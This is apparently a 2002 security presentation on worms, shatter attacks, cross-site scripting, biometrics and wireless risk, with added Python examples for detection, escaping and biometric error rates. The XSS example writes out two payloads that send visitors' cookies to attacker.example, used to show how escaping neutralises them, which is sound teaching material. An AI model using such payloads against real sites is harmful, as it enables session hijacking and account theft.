2001 Symantec Corporation, All Rights Reserved
Some Security Hot Issues
Allan Wall
BCS North London Branch Meeting
13th November 2002
Who is the enemy?

Classification        Attacker Description                     Target                      Results
Computer Crime        Vandal, Script Kiddie, Packet Monkey     Email, Web Sites            Downtime, Defacement, Denial of Service
Computer Crime        ‘Criminal’ Cracker, ‘Black Hat’          Assets                      Monetary Gain
Information Warfare   Government Organization                  Political Infrastructure    Political Power, Balance Change
Cyber Terrorist       Terrorists, Non-State Actors             Physical Infrastructure     Destruction
Where do the threats come from?

Attacks per 10,000 Internet users, Jan. – Jun. 2002 (Symantec 2002)

Countries > 1M Internet users          Countries < 1M Internet users
Country      Attacks                   Country      Attacks
Israel       33.1                      Kuwait       50.8
Hong Kong    22.1                      Iran         30.8
France       19.9                      Peru         24.5
Belgium      17.6                      Chile        24.4
Thailand     15.9                      Nigeria      22.3
The Redundant Message: Cost of Damage
CodeRed estimated cost: 2.5 billion dollars
Nimda estimated cost: 500+ million dollars
Losses reported by 186 respondents in the 2001 CSI/FBI survey:
• $151,230,100 – Theft of proprietary information
• $45,288,150 – Virus
• $35,001,650 – Insider Net Abuse
• $19,066,601 – System Penetration
• $4,283,600 – Denial of Service
The Blended Threat
Isn’t going away. Combines hacking, DoS, and worm-like propagation.
Most recent example – W32.Bugbear@mm:
• Mass-mailing worm with its own SMTP engine
• Discovers and uses network shares to spread
• Logs keystrokes
• Creates a backdoor for remote access
• Attempts to disable AV and personal firewall products
• Due to a bug in its shared-drive spreading routine, it can overwhelm shared printers, causing them to print reams of gibberish
Blended Threat Defence
Proactive vulnerability management
Security in layers
Security in depth
Superior security response
The Sleeper Virus
Not a fast mailer or a mass mailer: slower and more subtle
Hybris – a computer worm that uses encrypted plug-ins to update itself over the Internet
Sits quietly monitoring email traffic
Compiles a list of addresses and slowly leaks email infections
Morphs depending on updates
The Sleeper Virus Defence
Update virus definitions frequently
Treat email attachments with suspicion
Use a personal firewall
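Both the blended threat above (a Bugbear-style worm with its own SMTP engine) and the sleeper virus (a Hybris-style worm that leaks infections slowly) share one network symptom: the infected workstation delivers mail by connecting to port 25 on many outside servers directly, instead of through the corporate relay. The script below is an added example, not code from the original slides or from any Symantec product; it scores each source host by the number of distinct SMTP servers it contacted directly within a sliding window, using constructed log lines in an assumed format and assumed addresses and thresholds. The fast mailer trips a five-minute window; the sleeper, sending one message an hour, only shows up once the window is a week long.

```python
"""Direct-SMTP sender detection over firewall connection logs.

Added example, not from the original slides or any Symantec product.
Log format, addresses and thresholds are assumptions for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed (constructed) log format, one outbound connection per line:
#   2002-11-13T09:00:00 src=10.1.2.3 dst=198.51.100.7 dport=25
LINE_RE = re.compile(r"^(\S+) src=(\S+) dst=(\S+) dport=(\d+)")
RELAY = "10.1.1.25"   # assumed corporate mail relay: the only legitimate outbound sender


def parse(line):
    """Return (timestamp, src, dst, dport) or None for lines that don't match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, src, dst, dport = m.groups()
    return datetime.fromisoformat(ts), src, dst, int(dport)


def direct_smtp_senders(lines, window, threshold, relay=RELAY):
    """Map src -> the largest number of distinct SMTP servers it contacted
    directly within any sliding `window`, keeping only sources where that
    count reaches `threshold`. Traffic to or from the relay is legitimate."""
    events = defaultdict(list)                # src -> [(ts, dst)]
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, src, dst, dport = rec
        if dport != 25 or src == relay or dst == relay:
            continue
        events[src].append((ts, dst))

    flagged = {}
    for src, evs in events.items():
        evs.sort()
        best, lo = 0, 0
        for hi in range(len(evs)):
            # Advance the window start until evs[lo..hi] fits inside it.
            while evs[hi][0] - evs[lo][0] > window:
                lo += 1
            best = max(best, len({dst for _, dst in evs[lo:hi + 1]}))
        if best >= threshold:
            flagged[src] = best
    return flagged


def find_fast_mailers(lines):
    """Bugbear-style behaviour: 10+ distinct SMTP servers within 5 minutes."""
    return direct_smtp_senders(lines, timedelta(minutes=5), threshold=10)


def find_sleepers(lines):
    """Hybris-style behaviour: 24+ distinct SMTP servers within a week."""
    return direct_smtp_senders(lines, timedelta(days=7), threshold=24)


def constructed_log():
    """Constructed sample traffic: a normal client that only talks to the
    relay, a fast mailer hitting 40 servers in two minutes, and a sleeper
    sending to one new server per hour for three days."""
    t0 = datetime(2002, 11, 13, 9, 0, 0)
    lines = []
    for i in range(30):   # normal workstation
        lines.append(f"{(t0 + timedelta(minutes=i)).isoformat()} src=10.1.2.10 dst={RELAY} dport=25")
    for i in range(40):   # Bugbear-style mass mailer
        lines.append(f"{(t0 + timedelta(seconds=3 * i)).isoformat()} src=10.1.2.20 dst=203.0.113.{i + 1} dport=25")
    for i in range(72):   # Hybris-style sleeper
        lines.append(f"{(t0 + timedelta(hours=i)).isoformat()} src=10.1.2.30 dst=198.51.100.{i + 1} dport=25")
    return lines


if __name__ == "__main__":
    log = constructed_log()
    print("fast mailers (5-minute window):", find_fast_mailers(log))
    print("sleepers (7-day window):       ", find_sleepers(log))
```

The short window reports only 10.1.2.20; the week-long window reports both 10.1.2.20 and 10.1.2.30. The lesson for the sleeper case is that a rate-based rule tuned for mass mailers never fires, and the detection has to keep state over days, or simply block direct outbound port 25 from workstations at the firewall.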
Shatter Attacks
The mechanism used is the Win32 API, which has been relatively static since Windows NT 3.1 was released in July 1993
Microsoft cannot change it without a full-scale redesign
An example – Windows messaging / queuing: any process on the interactive desktop can send window messages to any other window on that desktop, whatever that window's privilege, and a message that carries a callback address (WM_TIMER, for instance) makes the receiving process call it
An attacker can use these techniques to escalate their privileges
Shatter Attacks – Defence
Full-scale Windows redesign (scrapping Win32)
Better design by every Windows application vendor (in particular, privileged services should not put windows on the interactive desktop)
Protect your Windows systems to make it hard for undesirables to get access they can exploit
Needs continual monitoring
Cross-site scripting attacks – XSS
“Expert hacks Hotmail in 1 line of code!”
Attackers inject JavaScript, VBScript, ActiveX, HTML, or Flash to fool a user
Exploits dynamic web-site content, resulting in:
• account hijacking
• changing of user settings
• cookie theft / poisoning
• false advertising
Will become more common, even automated
XSS attacks – Defence
Design web pages that validate user input
HTML escaping of output
Using Perl scripting tools designed to help
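As an added example (not code from the original slides or the referenced SecuriTeam article), the script below puts the vulnerable pattern beside its fix: a page that copies a request parameter straight into its HTML, and the same page with the value HTML-escaped at the point of output. A small parser then tokenises each result the way a browser would, so the difference is visible as a count of `<script>` elements and `on*` event-handler attributes rather than as eyeballed markup. The page markup, the parameter name and the attacker host (attacker.example, a reserved name) are assumptions; the second payload shows that an attribute context needs quote escaping even though it contains no angle brackets.

```python
"""Reflected XSS: unescaped output beside its HTML-escaped fix.

Added example, not from the original slides or the referenced article.
Page markup, parameter name and attacker host are assumptions.
"""
import html
from html.parser import HTMLParser

# Classic cookie-theft payload for an injection point in the HTML body.
PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
# Payload for an injection point inside a quoted attribute value: no angle
# brackets at all; it closes the quote and adds an event-handler attribute.
ATTR_PAYLOAD = '" autofocus onfocus="document.location=\'http://attacker.example/?c=\'+document.cookie'


def render_unsafe(name):
    """Vulnerable: user-controlled value concatenated into the HTML body."""
    return f"<html><body><h1>Hello {name}</h1></body></html>"


def render_safe(name):
    """Hardened: escape at output; quote=True also neutralises both quote characters."""
    return f"<html><body><h1>Hello {html.escape(name, quote=True)}</h1></body></html>"


def render_attr_unsafe(value):
    """Vulnerable: value reflected inside a quoted attribute."""
    return f'<input name="q" value="{value}">'


def render_attr_safe(value):
    """Hardened: the same escaping call also covers the attribute context."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


class InjectionCounter(HTMLParser):
    """Tokenises markup as a browser would and counts what an injected
    payload must produce to execute: <script> elements and on* attributes."""

    def __init__(self):
        super().__init__()
        self.scripts = 0
        self.handlers = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        self.handlers += sum(1 for name, _ in attrs if name.startswith("on"))


def injections(document):
    """Return (script_elements, event_handler_attributes) found in `document`."""
    p = InjectionCounter()
    p.feed(document)
    p.close()
    return p.scripts, p.handlers


if __name__ == "__main__":
    for label, doc in [("body unsafe", render_unsafe(PAYLOAD)),
                       ("body safe", render_safe(PAYLOAD)),
                       ("attr unsafe", render_attr_unsafe(ATTR_PAYLOAD)),
                       ("attr safe", render_attr_safe(ATTR_PAYLOAD))]:
        print(f"{label:12} scripts/handlers={injections(doc)}  {doc}")
```

The unsafe body page yields one script element and the unsafe attribute page one `onfocus` handler; both escaped versions yield none, and the payload survives only as visible text. Escaping is context dependent: `html.escape` with `quote=True` is right for HTML text and quoted attribute values, but a value placed inside a JavaScript block or a URL needs the encoding for that context instead.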
Biometrics
• More secure and stronger identification
• Moving away from (multiple) IDs/passwords, reducing risk from “lost” or loaned credentials (including tokens)
• Most common: fingerprint, hand, iris / retina / facial / voice recognition
• Provides the inextricable link – the guarantee that the registered user is actually present
Or does it…….?
Biometrics
• Relatively high-cost solutions, immature technology – bigger cost/risk if they fail (but cheaper to support)
• Privacy and intrusiveness issues
• Accuracy – false positive / false negative rates
• Facial recognition: only 60-80% accurate, 1 in 100 false positives
• Unproven/untested technologies – just how hard/easy are they to spoof?
• Example: fingerprint recognition can be spoofed for <$20 in about 30 minutes using “jelly” fingers
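The false positive / false negative bullet hides an operating decision: a matcher returns a similarity score, the operator picks a threshold, and every threshold trades false accepts (impostors let in) against false rejects (genuine users locked out). The script below is an added example, not from the original slides or the BBC article; the genuine and impostor scores are constructed for the example and are not measurements of any real system. It computes the false accept rate (FAR) and false reject rate (FRR) across every candidate threshold, finds the equal-error point, and finds the cheapest threshold that holds false accepts to the slide's 1 in 100.

```python
"""False accept / false reject trade-off for a biometric matcher.

Added example, not from the original slides or the BBC article.
The score samples are constructed, not measurements of a real system.
"""

# Constructed matcher output: similarity scores for 10 genuine attempts and
# 100 impostor attempts (impostors spread evenly from 0.05 to 0.644).
GENUINE = [0.92, 0.88, 0.85, 0.81, 0.79, 0.77, 0.74, 0.70, 0.66, 0.58]
IMPOSTOR = [0.05 + 0.006 * i for i in range(100)]


def rates(threshold, genuine=GENUINE, impostor=IMPOSTOR):
    """Return (FAR, FRR) at `threshold`: FAR is the fraction of impostor
    scores accepted (>= threshold), FRR the fraction of genuine scores
    rejected (< threshold)."""
    far = sum(1 for s in impostor if s >= threshold) / len(impostor)
    frr = sum(1 for s in genuine if s < threshold) / len(genuine)
    return far, frr


def candidate_thresholds(genuine=GENUINE, impostor=IMPOSTOR):
    """Every observed score is a point where FAR or FRR can change."""
    return sorted(set(genuine) | set(impostor))


def threshold_for_far(max_far, genuine=GENUINE, impostor=IMPOSTOR):
    """Lowest threshold whose false accept rate does not exceed `max_far`,
    returned with the FAR and FRR it yields."""
    for t in candidate_thresholds(genuine, impostor):
        far, frr = rates(t, genuine, impostor)
        if far <= max_far:
            return t, far, frr
    raise ValueError("no threshold meets the FAR target")


def equal_error_rate(genuine=GENUINE, impostor=IMPOSTOR):
    """Threshold at which FAR and FRR are closest, with both rates."""
    best = None
    for t in candidate_thresholds(genuine, impostor):
        far, frr = rates(t, genuine, impostor)
        if best is None or abs(far - frr) < abs(best[1] - best[2]):
            best = (t, far, frr)
    return best


if __name__ == "__main__":
    t, far, frr = equal_error_rate()
    print(f"equal-error point:     threshold={t:.3f} FAR={far:.1%} FRR={frr:.1%}")
    t, far, frr = threshold_for_far(0.01)
    print(f"1-in-100 false accepts: threshold={t:.3f} FAR={far:.1%} FRR={frr:.1%}")
```

On the constructed data the equal-error point sits near a score of 0.59 with both rates at 10%; holding false accepts to 1 in 100 pushes the threshold to 0.644 and still rejects one genuine user in ten. Vendor accuracy figures quote one of these numbers; a deployment has to choose the threshold, and so the other one, explicitly.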
Background security checks
Less than 60% of organisations carry out checks on new staff
• IT security professionals
• Banking
• Critical infrastructure – energy, telecoms, utilities
Employees are still the weakest link
Targeted Attacks
Focussed attack on specific targets within the organisation:
• Spoof email or CD
Social engineering to create “familiarity”:
• Message on a business opportunity, hobby or interest
Low-activity malware implanted:
• Disables AV
• Collects keystrokes or audio
• Emails data out
Response – “Combined interoperable defence.”
The Good News… The Bad News… Airborne Viruses
Personal, local and wide-area connectivity is enabling the enterprise… and exposing it to new security risk
802.11 can be visible from over a mile away
Bluetooth: 30 feet
2.5G and 3G can be visible for many miles
Source: Symantec 2002
Airborne Viruses - Defence
Unless you don’t have assets worth protecting…
…don’t use wireless technology without putting in the countermeasures that are available!
The law of requisite variety (Prof. Ross Ashby)
Formal descriptions:
The abundance or variety of alternative control actions which a control mechanism is capable of executing must be at least equal to the abundance or variety of the spontaneous fluctuations which have to be corrected by the control mechanism, if the control mechanism is to perform its function effectively.
Only a greater amount of variety in a regulator can control the variety present in a given system.
The larger the variety of actions available to a control system, the larger the variety of perturbations it is able to compensate.
Only variety can destroy variety.
There must be as much variety in the control mechanism as there is variety in the threat.
Ways to win…
Proactive security – mitigate your risk (do not just rely on technology)
Threats are defeated by information + technology
Superior response capability
“In-source” / outsource
Size and flexibility in defence
References
Symantec figures: Internet Security Threat Report Volume II – http://enterprisesecurity.symantec.com/content.cfm?EID=0&ArticleID=1539
Blended threats: http://www.informationweek.com/story/IWK20020516S0020 and http://www.symantec.com/symadvantage/012/blended.html
Sleeper virus: http://news.zdnet.co.uk/story/0,,t269-s2083648,00.html
Shatter attacks: http://security.tombom.co.uk/shatter.html
Cross-site scripting: http://www.securiteam.com/securityreviews/5FP000A81E.html
Biometrics – BBC: http://news.bbc.co.uk/1/hi/sci/tech/1991517.stm
Airborne viruses: http://www.networkmagazine.com/article/NMG20001130S0001/2
Ross Ashby: http://pespmc1.vub.ac.be/ASHBBOOK.html